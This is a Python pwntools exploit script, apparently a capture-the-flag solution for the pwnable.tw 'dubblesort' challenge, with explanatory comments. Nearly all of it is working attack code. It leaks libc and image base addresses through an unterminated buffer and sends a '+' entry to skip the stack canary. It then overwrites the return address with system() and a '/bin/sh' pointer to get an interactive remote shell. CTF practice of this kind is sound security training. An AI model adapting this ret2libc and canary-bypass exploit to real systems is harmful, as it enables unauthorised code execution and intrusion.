# `from pwn import *` stays first: the explicit stdlib imports below must win
# over any same-named attribute the star import brings in.
from pwn import *
import glob
import os
import random
import signal
import struct
import subprocess
import sys
import time
# Suffix appended to the /tmp helper file names; empty means no per-run suffix.
salt = ""
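def clear(signum=None, stack=None):
    """Remove the temporary gdb helper files and exit with status 0.

    Installed as the handler for SIGINT/SIGHUP/SIGTERM and also called at the
    end of the script, so it accepts (and ignores) the handler arguments.

    Args:
        signum: signal number when invoked as a handler; unused.
        stack: interrupted frame when invoked as a handler; unused.

    Raises:
        SystemExit: always, with status 0.
    """
    print('Strip all debugging information')
    # Same file set the original removed with a shell `rm -f ...`; the paths are
    # resolved in Python so that `salt` (interpolated into them) never reaches a
    # shell parser.
    patterns = [
        '/tmp/gdb_symbols{}*',
        '/tmp/gdb_pid{}*',
        '/tmp/gdb_script{}*',
        '.payload.sw*',
    ]
    for pattern in patterns:
        for path in glob.glob(pattern.replace('{}', salt)):
            try:
                os.remove(path)
            except OSError as e:
                # Best effort, like `rm -f`: report and keep going.
                print(e)
    sys.exit(0)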
# Run the cleanup handler on the usual termination signals so the /tmp helper
# files do not outlive an interrupted session.
for sig in (signal.SIGINT, signal.SIGHUP, signal.SIGTERM):
    signal.signal(sig, clear)
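try:
    # Optional debugging helper: a (currently empty) C source compiled to a
    # shared object for gdb to load. Best effort throughout: any failure is
    # printed and the script continues.
    gdb_symbols = ''' '''
    symbols_c = '/tmp/gdb_symbols{}.c'.replace('{}', salt)
    symbols_so = '/tmp/gdb_symbols{}.so'.replace('{}', salt)
    with open(symbols_c, 'w') as f:
        f.write(gdb_symbols)
    # argv list instead of a shell string: the paths contain `salt`, so the
    # command must not be parsed by a shell. Exit status is ignored, as before.
    subprocess.call(['gcc', '-g', '-shared', symbols_c, '-o', symbols_so])
except Exception as e:
    print(e)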
# pwntools defaults for this target: verbose tube logging, 32-bit x86.
context.log_level = "debug"
context.arch = "i386"
execve_file = "./dubblesort"
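# Target selection. The original spawned `process(execve_file)` and immediately
# rebound `sh` to the remote connection, leaving the child process running
# unreferenced; only one tube is created now. For a local run, use
# `sh = process(execve_file)` here instead of remote().
sh = remote('chall.pwnable.tw', 10101)
# Binary and the libc build it is paired with; used for symbol offsets below.
elf = ELF(execve_file)
libc = ELF('./libc-2.23.so')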
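try:
    # Debugging helper: record the target's pid and a gdb script under /tmp so a
    # gdb started elsewhere can attach. $rebase() offsets are relative to the
    # loaded image base; the two addresses are specific to this binary.
    gdbscript = '''
b *$rebase(0xAFE)
b *$rebase(0xB17)
'''
    # proc.pidof() may not resolve a pid for a remote() tube; in that case the
    # except below prints the error and the script continues, as before.
    with open('/tmp/gdb_pid{}'.replace('{}', salt), 'w') as f:
        f.write(str(proc.pidof(sh)[0]))
    with open('/tmp/gdb_script{}'.replace('{}', salt), 'w') as f:
        f.write(gdbscript)
except Exception as e:
    print(e)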
# Leak stage. Send 0x19 bytes of filler, then read what follows the first 0x18
# echoed bytes: a 4-byte value masked to its page and adjusted by a fixed
# 0x1b0000 offset is taken as the libc base; after skipping 4 more bytes, the
# next 4-byte value adjusted by 0x601 is taken as the image base. Both offsets
# are specific to this libc build and binary. `image_addr` is only logged here.
sh.send('a' * 0x19)
sh.recvuntil('a' * 0x18)
libc_addr = (u32(sh.recvn(4)) & 0xfffff000) - 0x1b0000
log.success('libc_addr: ' + hex(libc_addr))
sh.recvn(4)
image_addr = u32(sh.recvn(4)) - 0x601
log.success('image_addr: ' + hex(image_addr))
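# Input stage: 35 entries in total (24 + 1 + 9 + 1 below), each sent as a line
# after the service's 'number : ' prompt. The prompt text is the service's own
# and is matched byte-for-byte.
sh.sendlineafter('How many numbers do you what to sort :', '35')
for _ in range(24):
    sh.sendlineafter('number : ', str(1))
# A non-numeric entry for the 25th slot.
sh.sendlineafter('number : ', '+')
# system() address (nine times), then the address of the "/bin/sh" string; both
# resolved from the leaked libc base plus offsets from the bundled libc-2.23.so.
for _ in range(9):
    sh.sendlineafter('number : ', str(libc_addr + libc.symbols['system']))
# libc.search() returns an iterator; the builtin next() works on Python 2 and 3,
# whereas the original .next() method call is Python-2-only.
binsh_addr = libc_addr + next(libc.search('/bin/sh\0'))
sh.sendlineafter('number : ', str(binsh_addr))
sh.interactive()
# Remove the /tmp helper files and exit (also the signal handler).
clear()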
|